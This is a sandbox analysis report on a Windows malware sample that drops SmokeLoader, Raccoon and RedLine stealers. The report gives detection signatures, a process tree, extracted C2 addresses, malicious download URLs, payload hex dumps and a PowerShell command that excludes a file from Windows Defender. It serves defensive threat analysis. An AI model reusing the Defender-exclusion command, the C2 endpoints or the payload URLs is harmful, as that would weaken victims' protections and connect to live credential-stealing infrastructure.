Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report SYzU0M7gx6.exe

Overview

General Information

Sample Name:SYzU0M7gx6.exe
Analysis ID:511802
MD5:a9e51d671615e79cdb9cb22aa80401ad
SHA1:5c98f763cf0de4b099b3c5b59c4b6afd23324f02
SHA256:83d969f48d9ba67f00e732c7ddef343f9b23b3048228a266214a991d52856b4f
Tags:exeRaccoonStealer
Infos:

Most interesting Screenshot:

Detection

Raccoon RedLine SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM3
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Yara detected Raccoon Stealer
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Found malware configuration
Yara detected UAC Bypass using CMSTP
DLL reload attack detected
Benign windows process drops PE files
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Sigma detected: Suspicious Svchost Process
.NET source code contains very large array initializations
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Adds a directory exclusion to Windows Defender
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Sample uses process hollowing technique
Writes to foreign memory regions
Renames NTDLL to bypass HIPS
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Sigma detected: Powershell Defender Exclusion
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Contains functionality to call native functions
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • SYzU0M7gx6.exe (PID: 6048 cmdline: 'C:\Users\user\Desktop\SYzU0M7gx6.exe' MD5: A9E51D671615E79CDB9CB22AA80401AD)
    • SYzU0M7gx6.exe (PID: 852 cmdline: 'C:\Users\user\Desktop\SYzU0M7gx6.exe' MD5: A9E51D671615E79CDB9CB22AA80401AD)
      • explorer.exe (PID: 3292 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • svchost.exe (PID: 6148 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • AdvancedRun.exe (PID: 400 cmdline: 'C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
            • AdvancedRun.exe (PID: 772 cmdline: 'C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\AdvancedRun.exe' /SpecialRun 4101d8 400 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
          • powershell.exe (PID: 6932 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\2049.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
            • conhost.exe (PID: 6940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • aspnet_regbrowsers.exe (PID: 6976 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe MD5: B490A24A9328FD89155F075FA26C0DEC)
        • 9A51.exe (PID: 6348 cmdline: C:\Users\user~1\AppData\Local\Temp\9A51.exe MD5: 700EA4A91C03D0A6E73F2E8769991D05)
          • 9A51.exe (PID: 6440 cmdline: C:\Users\user~1\AppData\Local\Temp\9A51.exe MD5: 700EA4A91C03D0A6E73F2E8769991D05)
        • 2049.exe (PID: 6148 cmdline: C:\Users\user~1\AppData\Local\Temp\2049.exe MD5: F57B28AEC65D4691202B9524F84CC54A)
        • 3113.exe (PID: 5632 cmdline: C:\Users\user~1\AppData\Local\Temp\3113.exe MD5: 787AF677D0C317E8062B9705CB64F951)
        • 3C9D.exe (PID: 5908 cmdline: C:\Users\user~1\AppData\Local\Temp\3C9D.exe MD5: 73252ACB344040DDC5D9CE78A5D3A4C2)
        • 5508.exe (PID: 6284 cmdline: C:\Users\user~1\AppData\Local\Temp\5508.exe MD5: 9FA070AF1ED2E1F07ED8C9F6EB2BDD29)
          • AdvancedRun.exe (PID: 7116 cmdline: 'C:\Users\user\AppData\Local\Temp\e6afa9cb-72f6-46b2-8522-aff4fca0d0ff\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e6afa9cb-72f6-46b2-8522-aff4fca0d0ff\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
        • 6630.exe (PID: 6420 cmdline: C:\Users\user~1\AppData\Local\Temp\6630.exe MD5: 539C39A9565CD4B120E5EB121E45C3C2)
        • B644.exe (PID: 6896 cmdline: C:\Users\user~1\AppData\Local\Temp\B644.exe MD5: 5EB13887D3DC0B841AACC50770A87213)
  • dtrsehc (PID: 6312 cmdline: C:\Users\user\AppData\Roaming\dtrsehc MD5: A9E51D671615E79CDB9CB22AA80401AD)
    • dtrsehc (PID: 6452 cmdline: C:\Users\user\AppData\Roaming\dtrsehc MD5: A9E51D671615E79CDB9CB22AA80401AD)
  • cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": ["45.9.20.149:10844"], "Bot Id": ""}

Threatname: SmokeLoader

{"C2 list": ["http://193.56.146.214/", "https://193.56.146.214/"]}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\3113.exeSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x43bf:$x1: https://cdn.discordapp.com/attachments/
C:\Users\user\AppData\Local\Temp\5508.exeSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x20735:$x1: https://cdn.discordapp.com/attachments/
  • 0x207e9:$x1: https://cdn.discordapp.com/attachments/
C:\Users\user\AppData\Local\Temp\2049.exeSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x7b593:$x1: https://cdn.discordapp.com/attachments/
  • 0x7b647:$x1: https://cdn.discordapp.com/attachments/

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.306623599.00000000004D1000.00000004.00020000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000028.00000000.469526314.0000000000402000.00000040.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      00000028.00000000.472626194.0000000000402000.00000040.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        00000022.00000002.455599908.0000000004910000.00000004.00000001.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          00000014.00000002.368282987.00000000004A0000.00000004.00000001.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            Click to see the 17 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.SYzU0M7gx6.exe.2be15a0.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              21.2.dtrsehc.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                30.2.3C9D.exe.3080e50.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                  40.0.aspnet_regbrowsers.exe.400000.4.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    18.2.dtrsehc.2be15a0.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                      Click to see the 35 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Suspicious Script Execution From Temp FolderShow sources
                      Source: Process startedAuthor: Florian Roth, Max Altgelt: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\2049.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\2049.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p, ParentImage: C:\Windows\System32\svchost.exe, ParentProcessId: 6148, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\2049.exe' -Force, ProcessId: 6932
                      Sigma detected: Suspicious Svchost ProcessShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3292, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p, ProcessId: 6148
                      Sigma detected: Powershell Defender ExclusionShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\2049.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\2049.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p, ParentImage: C:\Windows\System32\svchost.exe, ParentProcessId: 6148, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\2049.exe' -Force, ProcessId: 6932
                      Sigma detected: Non Interactive PowerShellShow sources
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\2049.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\2049.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p, ParentImage: C:\Windows\System32\svchost.exe, ParentProcessId: 6148, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\2049.exe' -Force, ProcessId: 6932
                      Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3292, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p, ProcessId: 6148
                      Sigma detected: T1086 PowerShell ExecutionShow sources
                      Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132800260237562015.6932.DefaultAppDomain.powershell

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Yara detected Raccoon StealerShow sources
                      Source: Yara matchFile source: 37.3.B644.exe.4850000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.3.B644.exe.4850000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000025.00000003.445981143.0000000004850000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: B644.exe PID: 6896, type: MEMORYSTR
                      Antivirus detection for URL or domainShow sources
                      Source: http://telegalive.top/agrybirdsgamereptAvira URL Cloud: Label: malware
                      Source: http://sysaheu90.top/game.exeAvira URL Cloud: Label: malware
                      Source: http://privacytoolzforyou-6000.top/downloads/toolspab2.exeAvira URL Cloud: Label: malware
                      Source: http://toptelete.top/agrybirdsgamereptAvira URL Cloud: Label: malware
                      Source: http://hajezey1.top/Avira URL Cloud: Label: malware
                      Source: http://telegalive.top/Avira URL Cloud: Label: malware
                      Found malware configurationShow sources
                      Source: 00000022.00000002.455599908.0000000004910000.00000004.00000001.sdmpMalware Configuration Extractor: SmokeLoader {"C2 list": ["http://193.56.146.214/", "https://193.56.146.214/"]}
                      Source: 40.0.aspnet_regbrowsers.exe.400000.4.unpackMalware Configuration Extractor: RedLine {"C2 url": ["45.9.20.149:10844"], "Bot Id": ""}
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeReversingLabs: Detection: 29%
                      Source: C:\Users\user\AppData\Local\Temp\3113.exeReversingLabs: Detection: 22%
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeReversingLabs: Detection: 79%
                      Source: C:\Users\user\AppData\Local\Temp\5508.exeReversingLabs: Detection: 42%
                      Source: C:\Users\user\AppData\Local\Temp\6630.exeReversingLabs: Detection: 45%
                      Source: C:\Users\user\AppData\Roaming\gjrsehcReversingLabs: Detection: 79%
                      Machine Learning detection for sampleShow sources
                      Source: SYzU0M7gx6.exeJoe Sandbox ML: detected
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Roaming\dtrsehcJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\6630.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\9A51.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\5508.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\B644.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\3113.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\gjrsehcJoe Sandbox ML: detected

                      Exploits:

                      barindex
                      Yara detected UAC Bypass using CMSTPShow sources
                      Source: Yara matchFile source: 28.2.2049.exe.5c00000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.2049.exe.61aa840.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.2049.exe.61aa840.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.2049.exe.5c00000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001C.00000003.475863155.000000000624B000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.509422650.0000000005C00000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.509654800.0000000005FF1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 2049.exe PID: 6148, type: MEMORYSTR
                      Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.7:49830 version: TLS 1.0
                      Source: SYzU0M7gx6.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                      Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.7:49810 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.7:49813 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 81.177.141.36:443 -> 192.168.2.7:49817 version: TLS 1.2
                      Source: Binary string: C:\vojos\fuw.pdb source: 3C9D.exe, 0000001E.00000000.397350725.0000000000417000.00000002.00020000.sdmp, 3C9D.exe.7.dr
                      Source: Binary string: C:\kelut\takemiv\botuw31-mejosek-li.pdb source: 6630.exe.7.dr
                      Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: 2049.exe, 0000001C.00000002.504210996.0000000003999000.00000004.00000001.sdmp, AdvancedRun.exe, 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000024.00000002.432184416.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002A.00000002.477940508.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.28.dr
                      Source: Binary string: w+C:\honecogas58\lobitecip\siv\tivaruxanujel\93 vu.pdb` source: SYzU0M7gx6.exe
                      Source: Binary string: NH<*-C:\keso6.pdb` source: B644.exe.7.dr
                      Source: Binary string: C:\honecogas58\lobitecip\siv\tivaruxanujel\93 vu.pdb source: SYzU0M7gx6.exe
                      Source: Binary string: wntdll.pdbUGP source: 3C9D.exe, 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, 1105.tmp.30.dr
                      Source: Binary string: wntdll.pdb source: 3C9D.exe, 1105.tmp.30.dr
                      Source: Binary string: C:\keso6.pdb source: B644.exe.7.dr
                      Source: Binary string: WC:\kelut\takemiv\botuw31-mejosek-li.pdb` source: 6630.exe.7.dr
                      Source: Binary string: C:\cilikaci91\kikoh\givokegexuhoti55 w.pdb source: 9A51.exe, 00000013.00000000.336974011.0000000000401000.00000020.00020000.sdmp, 9A51.exe, 00000014.00000000.351961783.0000000000401000.00000020.00020000.sdmp, 9A51.exe.7.dr
                      Source: Binary string: C:\cilikaci91\kikoh\givokegexuhoti55 w.pdb` source: 9A51.exe, 00000013.00000000.336974011.0000000000401000.00000020.00020000.sdmp, 9A51.exe, 00000014.00000000.351961783.0000000000401000.00000020.00020000.sdmp, 9A51.exe.7.dr

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.7:49845 -> 194.180.174.181:80
                      Source: TrafficSnort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.7:49845 -> 194.180.174.181:80
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\explorer.exeDomain query: iyc.jelikob.ru
                      Source: C:\Windows\explorer.exeDomain query: xacokuo8.top
                      Source: C:\Windows\explorer.exeNetwork Connect: 216.128.137.31 80Jump to behavior
                      Source: C:\Windows\explorer.exeDomain query: privacytoolzforyou-6000.top
                      Source: C:\Windows\explorer.exeDomain query: hajezey1.top
                      Source: C:\Windows\explorer.exeDomain query: sysaheu90.top
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorURLs: http://193.56.146.214/
                      Source: Malware configuration extractorURLs: https://193.56.146.214/
                      Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
                      Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/903575517888925756/6D9E3C88.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/903575519373697084/F83CB811.jpg HTTP/1.1Host: cdn.discordapp.com
                      Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/903333369742491648/1E88D378.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/902526114763767818/A623D0D3.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/902526117016109056/AB0F9338.jpg HTTP/1.1Host: cdn.discordapp.com
                      Source: global trafficHTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: toptelete.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 132Host: 194.180.174.181
                      Source: global trafficHTTP traffic detected: GET //l/f/9Z2CynwB3dP17SpzOnMI/1a86e602d0d2d72a354901c42f4d11f8f79e44b1 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.181
                      Source: global trafficHTTP traffic detected: GET //l/f/9Z2CynwB3dP17SpzOnMI/ffdc8614f62a76a5c7889757f570f02f455435ee HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.181
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cVContent-Length: 1409Host: 194.180.174.181
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Oct 2021 15:06:14 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38Last-Modified: Fri, 29 Oct 2021 15:06:02 GMTETag: "54a00-5cf7f2a5f3208"Accept-Ranges: bytesContent-Length: 346624Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 34 de 0b c3 70 bf 65 90 70 bf 65 90 70 bf 65 90 1f c9 ce 90 5c bf 65 90 1f c9 fb 90 52 bf 65 90 1f c9 cf 90 f0 bf 65 90 79 c7 f6 90 77 bf 65 90 70 bf 64 90 0f bf 65 90 1f c9 ca 90 71 bf 65 90 1f c9 ff 90 71 bf 65 90 1f c9 f8 90 71 bf 65 90 52 69 63 68 70 bf 65 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d4 9d 79 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 c8 03 00 00 c4 70 02 00 00 00 00 50 c8 01 00 00 10 00 00 00 e0 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 74 02 00 04 00 00 25 ea 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c4 cc 03 00 50 00 00 00 00 60 73 02 68 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 73 02 90 1b 00 00 30 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 bc 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 c8 03 00 00 10 00 00 00 c8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c8 69 6f 02 00 e0 03 00 00 16 00 00 00 cc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 6f 78 69 00 00 00 e5 02 00 00 00 50 73 02 00 04 00 00 00 e2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 68 3f 00 00 00 60 73 02 00 40 00 00 00 e6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 cc 23 01 00 00 a0 73 02 00 24 01 00 00 26 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Oct 2021 15:06:57 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38Last-Modified: Fri, 29 Oct 2021 15:06:02 GMTETag: "93400-5cf7f2a60acf0"Accept-Ranges: bytesContent-Length: 603136Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 34 de 0b c3 70 bf 65 90 70 bf 65 90 70 bf 65 90 1f c9 ce 90 5c bf 65 90 1f c9 fb 90 52 bf 65 90 1f c9 cf 90 f0 bf 65 90 79 c7 f6 90 77 bf 65 90 70 bf 64 90 0f bf 65 90 1f c9 ca 90 71 bf 65 90 1f c9 ff 90 71 bf 65 90 1f c9 f8 90 71 bf 65 90 52 69 63 68 70 bf 65 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 